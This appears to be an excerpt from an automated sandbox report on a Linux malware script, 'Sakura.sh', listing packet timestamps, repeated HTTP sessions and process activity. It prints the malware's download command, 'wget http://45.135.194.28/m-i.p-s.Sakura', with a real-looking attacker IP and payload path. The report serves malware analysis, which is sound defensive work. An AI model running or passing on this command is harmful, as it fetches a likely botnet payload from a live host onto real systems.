                                                                      Mar 18, 2025 13:46:33.554141998 CET4950080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:33.560338020 CET804950045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:33.560448885 CET4950080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:33.562036037 CET4950080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:33.567631006 CET804950045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:35.200393915 CET804950045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:35.202505112 CET4950080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:35.208101034 CET804950045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:41.487507105 CET43928443192.168.2.2391.189.91.42
                                                                      Mar 18, 2025 13:46:44.209086895 CET4950280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:44.213850975 CET804950245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:44.213948965 CET4950280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:44.217370987 CET4950280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:44.222104073 CET804950245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:45.890355110 CET804950245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:45.890763044 CET4950280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:45.893712044 CET4950280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:45.898313999 CET804950245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:55.902343988 CET4950480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:55.907172918 CET804950445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:55.907241106 CET4950480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:55.909825087 CET4950480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:55.914470911 CET804950445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:57.545725107 CET804950445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:46:57.548557043 CET4950480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:46:57.553273916 CET804950445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:07.553596020 CET4950680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:07.558501959 CET804950645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:07.558579922 CET4950680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:07.560295105 CET4950680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:07.564977884 CET804950645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:09.201998949 CET804950645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:09.203457117 CET4950680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:09.204212904 CET4950680192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:09.208916903 CET804950645.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:19.208537102 CET4950880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:19.214021921 CET804950845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:19.214099884 CET4950880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:19.216412067 CET4950880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:19.222048998 CET804950845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:20.857976913 CET804950845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:20.859791040 CET4950880192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:20.864547968 CET804950845.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:30.866966009 CET4951080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:30.873541117 CET804951045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:30.873625994 CET4951080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:30.875355005 CET4951080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:30.880125999 CET804951045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:32.524147034 CET804951045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:32.526623011 CET4951080192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:32.532169104 CET804951045.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:42.532898903 CET4951280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:42.537586927 CET804951245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:42.537702084 CET4951280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:42.540714025 CET4951280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:42.545356035 CET804951245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:44.186379910 CET804951245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:44.186661959 CET4951280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:44.189742088 CET4951280192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:44.194365025 CET804951245.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:54.194259882 CET4951480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:54.198968887 CET804951445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:54.199090004 CET4951480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:54.200650930 CET4951480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:54.205322027 CET804951445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:55.847593069 CET804951445.135.194.28192.168.2.23
                                                                      Mar 18, 2025 13:47:55.849862099 CET4951480192.168.2.2345.135.194.28
                                                                      Mar 18, 2025 13:47:55.854636908 CET804951445.135.194.28192.168.2.23
                                                                      • 45.135.194.28
                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      0192.168.2.234948445.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:44.270634890 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      1192.168.2.234948645.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:46.947782993 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      2192.168.2.234948845.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:50.623742104 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      3192.168.2.234949045.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:55.296960115 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      4192.168.2.234949245.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:00.951803923 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      5192.168.2.234949445.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:07.629508972 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      6192.168.2.234949645.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:15.281068087 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      7192.168.2.234949845.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:23.917514086 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      8192.168.2.234950045.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:33.562036037 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      9192.168.2.234950245.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:44.217370987 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      10192.168.2.234950445.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:55.909825087 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      11192.168.2.234950645.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:07.560295105 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      12192.168.2.234950845.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:19.216412067 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      13192.168.2.234951045.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:30.875355005 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      14192.168.2.234951245.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:42.540714025 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      15192.168.2.234951445.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:54.200650930 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      System Behavior

                                                                      Start time (UTC):12:45:43
                                                                      Start date (UTC):18/03/2025
                                                                      Path:/usr/bin/bash
                                                                      Arguments:/usr/bin/bash /tmp/Sakura.sh.bin
                                                                      File size:1183448 bytes
                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                      Start time (UTC):12:45:43
                                                                      Start date (UTC):18/03/2025
                                                                      Path:/usr/bin/bash
                                                                      Arguments:-
                                                                      File size:1183448 bytes
                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                      Start time (UTC):12:45:43
                                                                      Start date (UTC):18/03/2025
                                                                      Path:/usr/bin/wget
                                                                      Arguments:wget http://45.135.194.28/m-i.p-s.Sakura
                                                                      File size:548568 bytes
                                                                      MD5 hash:996940118df7bb2aaa718589d4e95c08